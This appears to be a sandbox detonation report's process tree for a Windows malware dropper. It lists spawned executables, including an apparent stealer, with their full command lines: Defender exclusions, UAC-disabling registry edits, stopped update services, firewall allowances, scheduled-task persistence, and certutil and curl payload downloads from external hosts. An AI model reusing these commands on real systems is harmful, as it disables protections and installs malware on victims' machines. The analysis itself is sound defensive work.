- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Wave" /tr "C:\Users\Admin\AppData\Roaming\Wave.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1008
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3544436.exe"C:\Users\Admin\AppData\Local\Temp\Files\3544436.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NOTallowedtocrypt.exe"C:\Users\Admin\AppData\Local\Temp\Files\NOTallowedtocrypt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2740
-
-
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3836
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"5⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:480
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe6⤵PID:2204
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:1320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\m.exe"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2820 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
PID:948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:3224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
PID:404 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4672
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2508
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3128
-
-
-
C:\Users\Admin\AppData\Local\Temp\2232519369.exeC:\Users\Admin\AppData\Local\Temp\2232519369.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:5656
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:5692
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5752
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\685410430.exeC:\Users\Admin\AppData\Local\Temp\685410430.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5788
-
-
C:\Users\Admin\AppData\Local\Temp\247805573.exeC:\Users\Admin\AppData\Local\Temp\247805573.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\2014831613.exeC:\Users\Admin\AppData\Local\Temp\2014831613.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\3132929399.exeC:\Users\Admin\AppData\Local\Temp\3132929399.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1824
-
-
C:\Users\Admin\AppData\Local\Temp\309012054.exeC:\Users\Admin\AppData\Local\Temp\309012054.exe5⤵PID:11480
-
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe6⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\517116542.exeC:\Users\Admin\AppData\Local\Temp\517116542.exe7⤵PID:22408
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:3084
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:20920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:19252
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:18824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\91909899.exeC:\Users\Admin\AppData\Local\Temp\91909899.exe7⤵PID:19656
-
-
C:\Users\Admin\AppData\Local\Temp\266131776.exeC:\Users\Admin\AppData\Local\Temp\266131776.exe7⤵PID:23968
-
-
C:\Users\Admin\AppData\Local\Temp\2536329432.exeC:\Users\Admin\AppData\Local\Temp\2536329432.exe7⤵PID:24872
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\c2.exe"C:\Users\Admin\AppData\Local\Temp\Files\c2.exe"3⤵
- Executes dropped EXE
PID:3920
-
-
C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4088 -
C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 3004⤵
- Program crash
PID:3528
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe" & del "C:\ProgramData\*.dll"" & exit4⤵
- System Location Discovery: System Language Discovery
PID:1144 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2220 -
C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe"C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall4⤵
- Sets service image path in registry
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\r.exe"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3904
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wwbizsrvs.exe"C:\Users\Admin\AppData\Local\Temp\Files\wwbizsrvs.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E4B9.tmp\E4BA.tmp\E4BB.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"4⤵PID:5896
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Access Token Manipulation: Create Process with Token
PID:5924 -
C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E67E.tmp\E67F.tmp\E680.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"7⤵
- Enumerates connected drives
PID:764 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:6128
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:1400
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:4488
-
-
C:\Windows\system32\attrib.exeattrib +s +h e:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2652
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat8⤵PID:3184
-
-
C:\Windows\system32\certutil.execertutil -urlcache * delete8⤵PID:1160
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:1708
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 1008⤵
- Delays execution with timeout.exe
PID:3152
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5564 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc66c13cb8,0x7ffc66c13cc8,0x7ffc66c13cd85⤵PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2008 /prefetch:25⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:85⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:15⤵PID:4636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:15⤵PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:15⤵PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:15⤵PID:1040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:15⤵PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:15⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:15⤵PID:5860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:15⤵PID:5884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6096 /prefetch:85⤵PID:792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4660 /prefetch:25⤵PID:10220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:15⤵PID:13084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:15⤵PID:10588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:15⤵PID:18976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe"C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe"3⤵
- Executes dropped EXE
PID:1260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off4⤵PID:648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Temp\mapper.exe4⤵PID:2388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Temp\driver.sys4⤵PID:3900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareinj.exe4⤵PID:3832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Temp\injectorold.exe4⤵PID:4940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareogfn.dll4⤵PID:3520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent > nul 2>&14⤵PID:1444
-
C:\Windows\system32\curl.execurl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent5⤵PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:5556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:3916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Temp\loader.exe4⤵PID:5412
-
C:\Windows\Temp\loader.exeC:\Windows\Temp\loader.exe5⤵
- Executes dropped EXE
PID:4136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&16⤵PID:5952
-
C:\Windows\system32\curl.execurl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent7⤵PID:5604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent > nul 2>&16⤵PID:560
-
C:\Windows\system32\curl.execurl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent7⤵PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&16⤵PID:6116
-
